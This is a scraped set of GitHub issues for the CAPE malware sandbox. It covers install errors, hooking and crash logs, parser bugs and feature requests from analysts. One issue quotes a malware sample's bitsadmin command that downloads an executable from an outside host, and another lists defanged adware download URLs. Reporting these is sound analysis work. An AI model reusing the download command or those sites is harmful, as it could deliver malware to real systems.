ctxis / cape Goto Github PK

Hello,
will you pull your modify to spender-sandbox git?
How can I merge your files with spender-sandbox and try?

This Word doc has a macro that executes an encoded powershell script:
5bc978433646fa357d6b2c29ab45f6789b14379c224d2d3fc25d310cc7258733

If I run with behavioral analysis either disabled or set disable_hook_content=1, the script will execute fully and attempt to download the next stage. However, if full hooking is left enabled the script is executed (shows up in executed_commands), but the network activity does not occur.

Seeing this a lot is this normal behavior? 64-bit Win7 w/SP1 and no updates.

2018-07-25 15:28:41,660 [root] WARNING: Unable to place hook on CoCreateInstance
2018-07-25 15:28:41,660 [root] WARNING: Unable to hook CoCreateInstance
2018-07-25 15:28:41,660 [root] WARNING: Unable to place hook on CoCreateInstanceEx
2018-07-25 15:28:41,660 [root] WARNING: Unable to hook CoCreateInstanceEx
2018-07-25 15:28:41,660 [root] WARNING: Unable to place hook on CoGetClassObject
2018-07-25 15:28:41,660 [root] WARNING: Unable to hook CoGetClassObject
2018-07-25 15:28:41,660 [root] WARNING: Unable to place hook on NtQueryAttributesFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtQueryAttributesFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtQueryFullAttributesFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtQueryFullAttributesFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtCreateFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtCreateFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtOpenFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtOpenFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtDeleteFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtDeleteFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtQueryDirectoryFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtQueryDirectoryFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtSetInformationFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtSetInformationFile
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtCreateKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtCreateKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtOpenKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtOpenKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtOpenKeyEx
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtOpenKeyEx
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtRenameKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtRenameKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtEnumerateKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtEnumerateKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtEnumerateValueKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtEnumerateValueKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtSetValueKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to hook NtSetValueKey
2018-07-25 15:28:41,676 [root] WARNING: Unable to place hook on NtQueryValueKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtQueryValueKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to place hook on NtQueryMultipleValueKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtQueryMultipleValueKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to place hook on NtDeleteKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtDeleteKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to place hook on NtDeleteValueKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtDeleteValueKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to place hook on NtQueryKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtQueryKey
2018-07-25 15:28:41,691 [root] WARNING: Unable to place hook on NtDuplicateObject
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtDuplicateObject
2018-07-25 15:28:41,691 [root] WARNING: Unable to place hook on NtClose
2018-07-25 15:28:41,691 [root] WARNING: Unable to hook NtClose

I use VirtualBox with win7 as my guest machine and ubuntu 16.04 as my host.
When I submit the sample, there are errors below.
How can I fix?

2018-04-19 230404,000 [root] INFO Date set to 04-19-18, time set to 150404
2018-04-19 230404,015 [root] ERROR Traceback (most recent call last)
File Cyxomlwanalyzer.py, line 1373, in module
analyzer.prepare()
File Cyxomlwanalyzer.py, line 991, in prepare
svcpid = self.pids_from_process_name_list([services.exe])
File Cyxomlwanalyzer.py, line 933, in pids_from_process_name_list
proclist.append((proc.ImageName.Buffer[proc.ImageName.Length2], proc.UniqueProcessId))
ValueError invalid string pointer 0x03691CD000000000
Traceback (most recent call last)
File Cyxomlwanalyzer.py, line 1373, in module
analyzer.prepare()
File Cyxomlwanalyzer.py, line 991, in prepare
svcpid = self.pids_from_process_name_list([services.exe])
File Cyxomlwanalyzer.py, line 933, in pids_from_process_name_list
proclist.append((proc.ImageName.Buffer[proc.ImageName.Length2], proc.UniqueProcessId))
ValueError invalid string pointer 0x03691CD000000000

If someone know how to fix it, please tell me!
Thanks!!

This sample runs with legacy cuckoomon.dll 4c09b1ec812ad0d8be2bbd476d40dd57, but fails to follow CreateThread with Capemon.

This behavior occurs with other samples as well.

Hello?
On your site cape.contextis.com the network activity was no longer visible. No pcap in "Network Analysis" for all samples.

Hello Guys,

I have setup the cuckoo in my physical machine, Cape sandbox is unable to captured the screenshots. I have installed the latest version of pillow in guest machine of windows 7.

.
Let me know if something is missed by me.
.
Thanks & Regards
Seantree

I'm running CAPE in my Windows 10 environment and using Virtualbox Win7 32bit as guest. Everytime I try to analyze a file, the analysis would timeout with the message "The analysis hit the critical timeout, terminating". From the web interface, I am able to see information about the static attributes of the file, as well as a VirusTotal score, but am not able to get runtime information such as RegKeys modified etc. I have attached the complete console output below

(cape_dev) john@DESKTOP-QTAN68N:/mnt/c/Users/john/Documents/cape_dev/CAPE$ python cuckoo.py

                               ),-.     /
  Cuckoo Sandbox              <(a  `---','
     no chance for malwares!  ( `-, ._> )
                               ) _>.___/
                                   _/

 Cuckoo Sandbox 1.3-CAPE
 www.cuckoosandbox.org
 Copyright (c) 2010-2015

 CAPE: Config and Payload Extraction
 github.com/ctxis/CAPE

2018-10-01 22:15:19,647 [root] INFO: Generating grammar tables from /usr/lib/python2.7/lib2to3/Grammar.txt
2018-10-01 22:15:19,676 [root] INFO: Generating grammar tables from /usr/lib/python2.7/lib2to3/PatternGrammar.txt
2018-10-01 22:15:42,834 [root] INFO: Updated running task ID 8 status to failed_analysis
2018-10-01 22:15:42,863 [lib.cuckoo.core.scheduler] INFO: Using "virtualbox" machine manager with max_analysis_count=0, max_machines_count=2, and max_vmstartup_count=2
2018-10-01 22:15:44,432 [lib.cuckoo.core.scheduler] INFO: Loaded 1 machine/s
2018-10-01 22:15:44,445 [lib.cuckoo.core.scheduler] INFO: Waiting for analysis tasks.
2018-10-01 22:15:45,529 [lib.cuckoo.core.scheduler] INFO: Task #9: Starting analysis of FILE '/tmp/resubmit_GYe43m/1284211e57621f84118ce28a4df024163f663c6891c9f154883df804b592ee08'
2018-10-01 22:15:45,556 [lib.cuckoo.core.scheduler] INFO: Task #9: File already exists at '/mnt/c/Users/john/Documents/cape_dev/CAPE/storage/binaries/1284211e57621f84118ce28a4df024163f663c6891c9f154883df804b592ee08'
2018-10-01 22:15:45,620 [lib.cuckoo.core.scheduler] INFO: Task #9: acquired machine cuckoo1 (label=IE11 - Win7)
2018-10-01 22:15:57,404 [lib.cuckoo.core.scheduler] WARNING: Unknown network routing destination specified, ignoring routing for this analysis: None
2018-10-01 22:15:57,407 [lib.cuckoo.core.scheduler] INFO: Enabled route 'None'
2018-10-01 22:15:57,491 [modules.auxiliary.sniffer] ERROR: Tcpdump is not accessible from this user, network capture aborted
2018-10-01 22:15:57,521 [lib.cuckoo.core.guest] INFO: Starting analysis on guest (id=cuckoo1, ip=192.168.56.102)


2018-10-01 22:20:42,324 [lib.cuckoo.core.scheduler] ERROR: The analysis hit the critical timeout, terminating.
2018-10-01 22:20:44,415 [lib.cuckoo.common.objects] WARNING: Unable to import yara (please compile from sources)
2018-10-01 22:20:44,435 [lib.cuckoo.common.objects] WARNING: failed to scan file with clamav Error 2 connecting /var/run/clamav/clamd.ctl. No such file or directory.
2018-10-01 22:20:45,123 [modules.processing.behavior] WARNING: Analysis results folder does not exist at path "/mnt/c/Users/john/Documents/cape_dev/CAPE/storage/analyses/9/logs".
2018-10-01 22:20:45,173 [lib.cuckoo.core.plugins] ERROR: Failed to run the processing module "Dropped":
Traceback (most recent call last):
  File "/mnt/c/Users/john/Documents/cape_dev/CAPE/lib/cuckoo/core/plugins.py", line 197, in process
    data = current.run()
  File "/mnt/c/Users/john/Documents/cape_dev/CAPE/modules/processing/dropped.py", line 26, in run
    file_names = os.listdir(self.dropped_path)
OSError: [Errno 2] No such file or directory: '/mnt/c/Users/john/Documents/cape_dev/CAPE/storage/analyses/9/files'
2018-10-01 22:20:45,226 [modules.processing.network] WARNING: The PCAP file does not exist at path "/mnt/c/Users/john/Documents/cape_dev/CAPE/storage/analyses/9/dump.pcap".
2018-10-01 22:20:48,348 [lib.cuckoo.common.objects] WARNING: failed to scan file with clamav Error 2 connecting /var/run/clamav/clamd.ctl. No such file or directory.
2018-10-01 22:20:49,732 [lib.cuckoo.core.scheduler] INFO: Task #9: reports generation completed (path=/mnt/c/Users/john/Documents/cape_dev/CAPE/storage/analyses/9)
2018-10-01 22:20:49,820 [lib.cuckoo.core.scheduler] INFO: Task #9: analysis procedure completed

After I updated CAPE to the current one, Latest commit 2f5ca82, logging seems a bit wonky after log_rotate commit. Each item seems to be logged twice, once with the proper formatting and another with the default formatting, and logs from cuckoo.py is also similarity logged into process.log which is supposed to be for CAPE/utils/process.py.

2018-09-18 16:24:42,595 [root] DEBUG: Importing modules...
Importing modules...
2018-09-18 16:24:42,791 [root] DEBUG: Imported "signatures" modules:
Imported "signatures" modules:

Looking at CAPE/lib/cuckoo/core/startup.py, it seems that TimedRotatingFileHandler is implemented twice, one taking backupCount from config another using hardcoded 30 days.

Hi,

I didn't see any URL submit option in web portal do you please tell me how to submit the URL's through web portal.
.
Thanks & Regards
Seantree

Hey Kev,

Would be awesome if you were also able to download the config when the extraction package is used, instead of only the payload.

Example: https://cape.contextis.com/analysis/2367/

Cheers

The latest Trickbot samples are giving the following error:

CAPE: malwareconfig parsing error with TrickBot: not well-formed (invalid token): line 1, column 0

I haven't had the time to look into the samples manually to see what may have changed.

Here's some of the sample MD5s:
d2d7a0384f6a5e4e7a2eb59a5f4488da
9979eb8a5e2c4fd32938497e6d4f896b

"Crashed cuckoomon during analysis. Report this error to the Github repo"

pid: 832
message: Exception 0xc0000005 reported at offset 0x22a00 in capemon itself while accessing 0x0 from hook RtlDispatchException

https://cape.contextis.com/analysis/20393/

Hi. I'm trying to set up CAPE for a school project. I've followed the following guide to set up my environment. However, I've run into an issue when starting cuckoo.py:

  eeee e   e eeee e   e  eeeee eeeee 
  8  8 8   8 8  8 8   8  8  88 8  88 
  8e   8e  8 8e   8eee8e 8   8 8   8 
  88   88  8 88   88   8 8   8 8   8 
  88e8 88ee8 88e8 88   8 8eee8 8eee8

 Cuckoo Sandbox 1.3-CAPE
 www.cuckoosandbox.org
 Copyright (c) 2010-2015

 CAPE: Config and Payload Extraction
 github.com/ctxis/CAPE

2018-01-18 17:21:02,019 [root] CRITICAL: CuckooCriticalError: Unable to import plugin "modules.processing.deduplication": No module named imagehash

I have verified my installation of ImageHash as well as its dependencies. Any idea on what could be the issue? Any help would be appreciated. Thanks in advance.

this may be a dumb question but I have read through the docs and am checking to see if the additional CAPE features/parser is setup to work with virtualbox?

Is there currently functionality in CAPE to run a dll in a specific process, instead of passing it to rundll?

SyntaxError: /opt/cuckoo/data/yara/CAPE/Kronos.yar(10): duplicated string identifier "$a2"

Need to make it $a3

The VirusTotal download function is broken due to some recent changes that I haven't yet had time to debug...

Hi,

CAPE is extracting this binary automatically and re-submitting it for analysis. The error message for why this fails is vague and doesn't help me understand whether the issue is with CAPE or the malware payload itself.

The same result on my local setup.

https://cape.contextis.com/analysis/17600/

Any chance we could get a feature into CAPE to download (and then run) a file when given a URL? Probably via one of the enabled network routing options.

Hi, I was trying to integrate CAPE with Cuckoo but it seems that something is missing.
I get this error:
Traceback (most recent call last):
File "/home/socadmin/cuckoo-modified/lib/cuckoo/core/plugins.py", line 197, in process
data = current.run()
File "/home/socadmin/cuckoo-modified/modules/processing/CAPE.py", line 293, in run
for dir_name, dir_names, file_names in os.walk(self.CAPE_path):
any help would be appreciated
M.

Hi @kevoreilly

I am analysing following links but it's not analyzing, it's a kind of BHO when a user access the following links and it contains the button on page which install extension/addon in the browser. When I submit these links to the sandbox it just opens the links in the browser nothing else it does. Kindly tell me the way please?
hxxp://watchingnewsonline.com/
hxxp://yourmapview.com/
hxxp://easycouponsaccess.com/
hxxp://www.propdfconverter.com/index.jhtml
hxxp://www.gamesquest.co/
hxxp://loginemailsfast.com/
hxxp://emailloginnow.com/Email?

hxxp://www.searchtuner.com/download/?offer_id=712&aff_id=5&url_id=962&source=1319268&aff_sub2=425312588801&ot=1&sah=728&cw=1366&nw=0

hxxp://screenwatch.yournewtab.com/?chid=127&oid=706&pubid=1319268&subid=425321025281&sah=728&cw=1366&nw=0

hxxp://watchmoretvnow.com/
hxxp://www.todaysnewsreporter.com/
hxxp://www.checknetspeed.online/li1tg?t1=test&t5={Browser}&cid=clk_id

hxxp://www.checkmyspeed.co/bir14?t1=S_Restructure_Test&t2={adgroup_name}&t3=speedtest%20net&t4=1t1&t5=250999826041&gclid=EAIaIQobChMIo_Wuq--72QIVl7rACh1tQAnzEAAYASAAEgIBkPD_BwE

hxxp://www.watchtvinstantly.com/?r=3&kw=Weather%20Season&gclid=EAIaIQobChMIhvatk7Of1gIVDLcbCh11UgoiEAAYAyAAEgJ9APD_BwE

hxxp://www.getsports.net/
hxxp://www.moviesearch.today/

.
Thanks & Regards
Seantree

A recent change is causing the CAPE processing module to take much longer to complete. I've tried to isolate the issue running with debug, but haven't had much luck. I'm thinking it has something to do with the abstracts.py changes, but can't confirm.

I'm including a sample hash that has been stuck processing for over 30 minutes.
609ae52d7655c3c1f9e0b14503de4e440bbf59fd774196fb24f2a4449c83f220

This sample is crashing capemon, but not cuckoomon.

https://cape.contextis.com/analysis/17610/

Not sure what's going on here, any ideas?

2017-06-21 15:21:20,505 [modules.reporting.mongodb] WARNING: results['procdump']['yara'] deleted due to >16MB size (29MB)
2017-06-21 15:21:20,506 [lib.cuckoo.core.plugins] ERROR: Failed to run the reporting module "MongoDB":
Traceback (most recent call last):
File "/opt/cuckoo/lib/cuckoo/core/plugins.py", line 631, in process
current.run(self.results)
File "/opt/cuckoo/modules/reporting/mongodb.py", line 202, in run
del report[parent_key][child_key]
TypeError: list indices must be integers, not str

Hi there,

I chanced upon the interesting works and bump into some issues. I am running a fresh installation of CAPE on ubuntu.

1. I have followed the steps, but failed please kindly help
2. how do i submit a sample of plugx malware? supposedly i have all 3 files that is required for the final payload to be assembled.

before_install: (completed all)
- sudo apt-get update -qq
- sudo apt-get install python-magic python-dpkt python-libvirt
- wget http://downloads.sourceforge.net/project/ssdeep/ssdeep-2.12/ssdeep-2.12.tar.gz
- tar -zxvf ssdeep-2.12.tar.gz
- cd ssdeep-2.12
- ./configure && make
- sudo make install
- cd ..
install: (error)

• pip install -r requirements.txt

Building wheels for collected packages: geoip
Running setup.py bdist_wheel for geoip ... error
Complete output from command /usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-build-7BfTk4/geoip/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" bdist_wheel -d /tmp/tmp5YmxyVpip-wheel- --python-tag cp27:
/usr/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url'
warnings.warn(msg)
running bdist_wheel
running build
running build_ext
building 'GeoIP' extension
creating build
creating build/temp.linux-x86_64-2.7
x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fno-strict-aliasing -Wdate-time -D_FORTIFY_SOURCE=2 -g -fstack-protector-strong -Wformat -Werror=format-security -fPIC -I/usr/include/python2.7 -c py_GeoIP.c -o build/temp.linux-x86_64-2.7/py_GeoIP.o -fno-strict-aliasing
py_GeoIP.c:23:19: fatal error: GeoIP.h: No such file or directory
compilation terminated.
error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

Failed building wheel for geoip
Running setup.py clean for geoip
Failed to build geoip
Installing collected packages: geoip, olefile, pillow, urllib3, elasticsearch, java-random, python-whois, beautifulsoup4, bs4, pefile2, pyvmomi, pype32, django-ratelimit, pydeep
Running setup.py install for geoip ... error
Complete output from command /usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-build-7BfTk4/geoip/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-SYmAPS-record/install-record.txt --single-version-externally-managed --compile:
/usr/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url'
warnings.warn(msg)
running install
running build
running build_ext
building 'GeoIP' extension
creating build
creating build/temp.linux-x86_64-2.7
x86_64-linux-gnu-gcc -pthread -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fno-strict-aliasing -Wdate-time -D_FORTIFY_SOURCE=2 -g -fstack-protector-strong -Wformat -Werror=format-security -fPIC -I/usr/include/python2.7 -c py_GeoIP.c -o build/temp.linux-x86_64-2.7/py_GeoIP.o -fno-strict-aliasing
py_GeoIP.c:23:19: fatal error: GeoIP.h: No such file or directory
compilation terminated.
error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

----------------------------------------

Command "/usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-build-7BfTk4/geoip/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-SYmAPS-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-build-7BfTk4/geoip/
p

I added the latest commits and am now getting the following errors. I've run multiple samples and get the same results.

2018-07-09 22:00:36,972 [lib.cuckoo.core.plugins] ERROR: Failed to run signature "CheckRemoteDebuggerPresent":
Traceback (most recent call last):
  File "/opt/cuckoo/utils/../lib/cuckoo/core/plugins.py", line 414, in run
    result = sig.on_call(call, proc)
  File "/opt/cuckoo/utils/../modules/signatures/CAPE.py", line 558, in on_call
    ProcessInformationClass = int(self.get_raw_argument(call, "ProcessInformationClass"), 0)
TypeError: int() can't convert non-string with explicit base
2018-07-09 22:00:37,056 [lib.cuckoo.core.plugins] ERROR: Failed to run signature "critical_process":
Traceback (most recent call last):
  File "/opt/cuckoo/utils/../lib/cuckoo/core/plugins.py", line 414, in run
    result = sig.on_call(call, proc)
  File "/opt/cuckoo/utils/../modules/signatures/critical_process.py", line 34, in on_call
    value = int(self.get_argument(call, "Value"))
TypeError: int() argument must be a string or a number, not 'NoneType'
2018-07-09 22:00:37,056 [lib.cuckoo.core.plugins] ERROR: Failed to run signature "dep_disable":
Traceback (most recent call last):
  File "/opt/cuckoo/utils/../lib/cuckoo/core/plugins.py", line 414, in run
    result = sig.on_call(call, proc)
  File "/opt/cuckoo/utils/../modules/signatures/dep_disable.py", line 34, in on_call
    value = int(self.get_argument(call, "Value"))
TypeError: int() argument must be a string or a number, not 'NoneType'
2018-07-09 22:00:37,071 [lib.cuckoo.core.plugins] ERROR: Failed to run signature "NtSetInformationThread":
Traceback (most recent call last):
  File "/opt/cuckoo/utils/../lib/cuckoo/core/plugins.py", line 414, in run
    result = sig.on_call(call, proc)
  File "/opt/cuckoo/utils/../modules/signatures/CAPE.py", line 497, in on_call
    ThreadInformationClass = int(self.get_raw_argument(call, "ThreadInformationClass"), 0)
TypeError: int() can't convert non-string with explicit base

Requesting config extraction for Ursnif. I am able to get the final Ursnif payload that's injected into Explorer.exe using CAPE extraction and a yara rule. I've done some RE and have the functions that build the comms strings prior to encryption. At this point, I'd like to dump the data along with the encryption key. Would this require a capemon dll to hook these functions? Thoughts?

There seems to be a couple of issues with some recent changes. I'm seeing this:

NoReverseMatch at /analysis/219/
Reverse for ' file ' with arguments '(u'droppedzip ', 219, u'0f5c19ddfd8238cf862f5036e8c9dab66875ed2b26cbb6c304eca6b2bb33d01e')' and keyword arguments '{}' not found. 0 pattern(s) tried: []

The problem line:
<a href="
{% url " file " "droppedzip " analysis.info.id file.sha256 %}
" class="btn btn-primary btn-small">Download ZIP

Problem is gone on restoring analysis/views.py and the dropped index.html to an older one, looks like the new zip download feature but I haven't had a chance to dig any further.

The following command is ran, however there is no secondary inspection of the new binary:

"bitsadmin /transfer ms5 http://postservises.org/layout.png C:\Users\user\AppData\Local\Temp/erierfri.exe"

See for reference: https://cape.contextis.com/analysis/12812/

Very interested in this project. I have a spender-sandbox Cuckoo instance running in my environment (with some gently mods.) How hard do you think it would be to integrate CAPE with my Cuckoo instance? Or does CAPE need to run on it's own? Thanks.

Getting the following error. Attaching sample.

'''
2018-08-16 15:58:47,279 [lib.cuckoo.core.plugins] ERROR: Failed to run signature "Compression":
Traceback (most recent call last):
File "/opt/cuckoo/utils/../lib/cuckoo/core/plugins.py", line 414, in run
result = sig.on_call(call, proc)
File "/opt/cuckoo/utils/../modules/signatures/CAPE.py", line 69, in on_call
machine_probe = struct.unpack("<H", buf[offset:offset+2])[0]
error: unpack requires a string argument of length 2
'''

sample md5:

9270ac1e013a3b33c44666a66795d0c0

web/analysis/views.py requires the VT results to be decompressed for the antivirus function

I can't seem to get any files that require IE to run without crashing. If I disable capemon it runs. Seems to happen with cuckoomon as well.

Seems to be something in Wininet.dll, and the last function I see get called is wininet.dll.InternetQueryOptionW

2018-09-04 15:15:53,755 [lib.cuckoo.common.netlog] INFO: Debug message from monitor: Exception Caught! PID: 204 EIP: ntdll.dll+5339d 7761339d, Fault Address: 00000074, Esp: 0021f1a0, Exception Code: c0000005,  ntdll.dll+1a5db ntdll.dll+18e62 ntdll.dll+51248 ntdll.dll+5339d WININET.dll+1c7e WININET.dll+10f590 IEFRAME.dll+a398f IEFRAME.dll+a44a6 IEFRAME.dll+a43fb IEFRAME.dll+a470f IEFRAME.dll+86b16 IEXPLORE.EXE+2c33 IEXPLORE.EXE+1028 kernel32.dll+1652d ntdll.dll+2c541 Bytes at EIP: 8b 41 74 44 8b b1 98 00 00 00 33 db 0b e8 4c 8d

2018-09-04 15:15:53,756 [lib.cuckoo.common.netlog] INFO: Debug message from monitor: Exception Caught! PID: 204 EIP: ntdll.dll+5339d 7761339d, Fault Address: 00000074, Esp: 0021f1a0, Exception Code: c0000005,  kernel32.dll+99460 ntdll.dll+93398 ntdll.dll+185c8 ntdll.dll+29d2d ntdll.dll+191cf ntdll.dll+51248 ntdll.dll+5339d WININET.dll+1c7e WININET.dll+10f590 IEFRAME.dll+a398f IEFRAME.dll+a44a6 IEFRAME.dll+a43fb IEFRAME.dll+a470f IEFRAME.dll+86b16 IEXPLORE.EXE+2c33 IEXPLORE.EXE+1028 kernel32.dll+1652d ntdll.dll+2c541 Bytes at EIP: 8b 41 74 44 8b b1 98 00 00 00 33 db 0b e8 4c 8d

I just noticed that CAPE includes copies of the files olefile.py, olevba, oleid, etc. (which is great, I'm glad they are useful)
As those tools are regularly updated to fix bugs and to support new formats and new obfuscation tricks, it would be better not to include old copies here, but to install the latest versions with pip.
Is there a specific reason why they are copied rather than imported?

It's been observed that CAPE's debugger does not work in KVM VMs - this is to do with the fact that KVM doesn't allow for use of the debug registers by the guest as discussed here:

https://patchwork.kernel.org/patch/4717311/
https://patchwork.kernel.org/patch/8436261/
https://bugzilla.redhat.com/show_bug.cgi?id=1068627

This means that several packages, most notably including the 'Extraction' behavioural package, will not work properly on these systems due to their dependence on the debugger.

If anyone knows of a workaround to allow use of debug registers within guest VMs on KVM, please let me know.

I'd like to add support for Trickbot malware. Any chance you would be willing to give me some pointers to writing CAPE mods? Thanks.

Any consideration for a Windows 10 capable cuckoomon?

binGraph images are currently output as SVG. These images cannot be easily saved and shared. The proposal is to change the output to PNG. This creates a lossless image, but can be saved + shared easily.

Changes required:

• CAPE/lib/cuckoo/common/graphs/binGraph/binGraph.py

  Line 172 in 355789c

  'format': 'svg',

  > change 'format' to 'png'

• CAPE/web/analysis/views.py

  Line 852 in b772fea

  bingraph_svg_content = ""

  > mod variable name bingraph_svg_content to bingraph_png_content (and all other references)

• bingraph_png_content needs to be base64 encoded so we can load this into the webpage with minimal effort

• CAPE/web/analysis/views.py

  Line 853 in b772fea

  bingraph_svg_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "bingraph", "ent.svg")

  > mod variable name bingraph_svg_path to bingraph_png_path (and all other references)

• All references to graphs.bingraph.content in view templates need to be modified to display a base64 encoded image (data URI) (e.g. https://stackoverflow.com/questions/8499633/how-to-display-base64-images-in-html)

Hey,

Great project. I ran PaFish, which had the following outcome:

[pafish] Start
[pafish] Windows version: 6.1 build 7601
[pafish] CPU: GenuineIntel (HV: VMwareVMware) Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHz
[pafish] CPU VM traced by checking the difference between CPU timestamp counters (rdtsc) forcing VM exit
[pafish] CPU VM traced by checking hypervisor bit in cpuid feature bits
[pafish] CPU VM traced by checking cpuid hypervisor vendor for known VM vendors
[pafish] VMware traced using MAC address starting with 00:05:69, 00:0C:29, 00:1C:14 or 00:50:56
[pafish] End

Submission:
https://cape.contextis.com/analysis/558/

Cheers

The imagehash module needs to be added to the requirements list.

I see you've disabled/replaced process memory dumps. I need to be able to grab strings and/or inspect the dump manually. What's your process for doing this now?

Malware can write binaries to the registry for persistence, etc. It would be nice to capture the data/binary as either a dropped file or supplementary file. I know the registry API hooks are logging the data, but it's limited to a small buffer currently.

I'd say this is more of a feature request than an issue.

When I try to make a request using the API to obtain the json report, the response is:
{
"error_value": "Reports directory does not exist",
"error": true
}
I have tried several examples and all of them have the same response. Some examples are:
https://cape.contextis.com/api/tasks/get/report/15965/json/
https://cape.contextis.com/api/tasks/get/report/15952/json/

Thank you in advance! I hope you can help me.

A task is submitted as the generic package type when Cuckoo can't determine its type by extension or file magic. This is resulting in Adobe Acrobat Reader to run. Of course when Reader runs it generates a lot of false positives, despite configuring it not to.

Any ideas why this is happening?

Hi,
I got the error " 'module' object has no attribute 'config' " on a file I analyzed. I can see it's a normal python error, if a module is not loaded (from google). I'm not a python coder, and don't know if this is even a problem. But the analyzed report is not showing any malicious behavior and suspect it's because the javadropper.py fails.
If you need malware file to test, I have a copy.

2018-05-08 19:44:33,270 [modules.processing.CAPE] INFO: CAPE: DC3-MWCP parser: No module named JavaDropper
2018-05-08 19:44:33,270 [modules.processing.CAPE] INFO: CAPE: Imported malwareconfig.com parser JavaDropper
2018-05-08 19:44:33,270 [modules.processing.CAPE] ERROR: CAPE: malwareconfig parsing error with JavaDropper: 'module' object has no attribute 'config'

just did a git pull for the latest update and when I tried to access the web ui I get the following error:

Request Method: | GET
ImportError
No module named rooter
/cuckoo/repos/CAPE/web/submission/views.py in , line 29
/usr/bin/python
2.7.12

looked at the cuckoo repo and saw they have rooter.py and so I checked this one and didn't see it in the CAPE repo. Any assistance when you get time would be awesome.

https://cape.contextis.com/analysis/19907/

Does not crash in your environment. However:

Crashed cuckoomon during analysis. Report this error to the Github repo.
pid: 4292
message: Exception 0xc0000005 reported at offset 0x5111 in capemon itself while accessing 0x6 from hook RtlDispatchException

I have limited time to debug this currently and am handing it off.

Should the curtain module run on the guest if it has been disabled in conf file?

I'm trying to download the executable from analysis #2053, but unable too. I have download the dropped files, but I'm trying to get a copy of executable to reverse engineer it. Your assistance would be greatly appreciated.

I have been using cuckoo for many years, so I will be downloading CAPE and installing it in my malware lab.